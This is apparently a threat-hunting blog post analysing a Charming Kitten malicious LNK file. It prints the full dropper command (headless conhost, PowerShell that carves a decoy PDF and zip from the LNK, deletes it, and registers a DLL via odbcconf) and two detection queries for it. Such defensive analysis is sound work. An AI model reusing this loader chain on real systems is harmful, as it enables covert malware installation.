128. Hunting for Charming Kitten

Hello everyone!

I rarely see adversaries use malicious documents nowadays. But I see LNK files more and more often! Today we'll look at another example, which belongs to Charming Kitten (we track this activity cluster as Cypress Werewolf).

So, the malicious LNK file distributed by the threat actors contained the following command:

conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr Wow`} ;

Yes, it's really juicy from detection and hunting perspective. For example, it abuses conhost.exe with --headless argument to run the script, it's a good candidate for hunting, but requires some tuning to remove related legitimate activity, of course:

event_type: "processcreatewin"

AND

proc_file_name: "conhost.exe"

AND

cmdline: "headless"

Another interesting detection opportunity is abusing odbcconf.exe to run regsvr32.exe in order to register malicious DLL:

event_type: "processcreatewin"

AND

proc_file_name: "odbcconf.exe"

AND

cmdline: "regsvr"

Which parts of the script seemed interesting to you?

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge